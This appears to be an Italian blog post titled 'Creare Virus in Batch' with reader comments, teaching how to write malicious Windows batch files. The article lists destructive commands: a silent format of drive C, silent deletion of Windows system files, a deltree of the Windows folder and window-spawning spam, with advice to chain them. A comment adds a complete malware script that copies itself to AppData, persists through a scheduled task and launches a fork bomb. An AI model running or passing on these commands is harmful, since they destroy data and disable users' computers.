Creare Virus in Batch

Con questo articolo vogliamo spiegare come possiamo essere infettati da dei semplici virus che possono essere scritti in linguaggio batch. Specifico che il termine virus in questo articolo sta ad intendere un software malevolo in generale non virus in senso stretto (così semplifichiamo e non ci perdiamo in lungaggini sulla differenza tra virus, worm, spyware ecc.)

Prima di cominciare dobbiamo comunque aggiungere che questi virus non sono molto pericolosi perchè, benchè possano creare danni seri, ormai nelle ultime versioni di windows bisogna avere il consenso dell’amministratore per apportare delle modifiche al file di sistema, quindi lo script malevolo non riuscirebbe ad agire indisturbato o verrebbe comunque bloccato.

Ancora una nota prima di cominciare: dobbiamo spiegare in cosa consistono gli script batch. Questi file (di solito di piccole dimensioni) sono salvati in formato .bat e non sono altro dei comandi che vengono dati al promt di ms-dos. Tutti coloro che hanno una minima conoscenza di dos possono creare questi file. Vediamo alcuni esempi di codice che possono aiutarci a capire meglio come funzionano questi virus. Contate che si creano semplicemente scrivendo il codice sul blocco note e salvandolo come “nome”.bat.

format c: /autotest /q /u

Salvando questo testo sul blocco note in un file .bat avrete creato un virus che formatta l’hard disk senza chiedere nessuna conferma all’utente. La maggioranza degli antivirus trova e annulla questo tipo di file.

start
start
start
start
….

Ognuno di questi comandi apre una finestra del prompt dei comandi di dos…immaginate cosa potrebbe succedere se scriveste 2000/3000 start.

erase /q C:/Windows/nomefile

Questo comando cancellerebbe il file “nomefile” dalla cartella Windows senza chiedere nessuna conferma di cancellazione.

deltree c:/Windows

In questo modo cancellerebbe tutto il contenuto della cartella windows. Bisogna dire in questo caso che questo comando nello specifico (come molti altri) è stato disattivato dalle ultime versioni di windows (per esempio nelle versioni Home di Win 7)

In conclusione dobbiamo aggiungere che questi comandi potrebbero essere combinati e messi uno dopo l’altro per creare più danni.

In questo articolo abbiamo visto solo alcune delle potenzialità dei file batch, ovviamente è una tecnica un po’ datata e con scarse possibilità di successo anche perchè il file deve essere eseguito per funzionare (anche se potrebbe essere messo in autorun) comunque ci ricorda una buona regola della sicurezza informatica: se non sappiamo da chi arriva o cosa contiene un file o una mail NON APRIAMOLO!

3 Commenti

  1. Bella! Mi piace!

    Ti chiedo un favore, a beneficio di tutti…se vuoi…potresti spiegare ogni passaggio dello script?

  2. Così dovrebbe essere più comprensibile, alcuni sono comandi propri del batch scripting, se cerchi in rete i comandi che non capisci trovi tonnellate di doc. 🙂 spero di esserti stato utile!

    @echo off
    setLocal EnableDelayedExpansion

    rem controlla esistenza del file nella directory appdata e nel caso non esista lo copia nella directory e cancella l’originale, nel caso esista va alla riga forkbomb e lancia l’attacco.
    IF EXIST %APPDATA%\bs.bat GOTO :FORKBOMB
    COPY %0 %APPDATA%\bs.bat

    rem crea lo scheduled task
    SCHTASKS /Create /SC MINUTE /MO 5 /TN BlackSheep /TR %APPDATA%\bs.bat /F”

    rem va alla riga end
    GOTO :END

    :FORKBOMB
    rem CREA IL LOOP CON LA FORKBOMB
    :loop
    set /a X=10000
    set /a N+=1
    start /MIN %0
    start /MIN %0 %0
    if !N! gtr !X! goto :END2
    goto :loop

    :END
    del %0

    :END2
    exit

I commenti sono bloccati.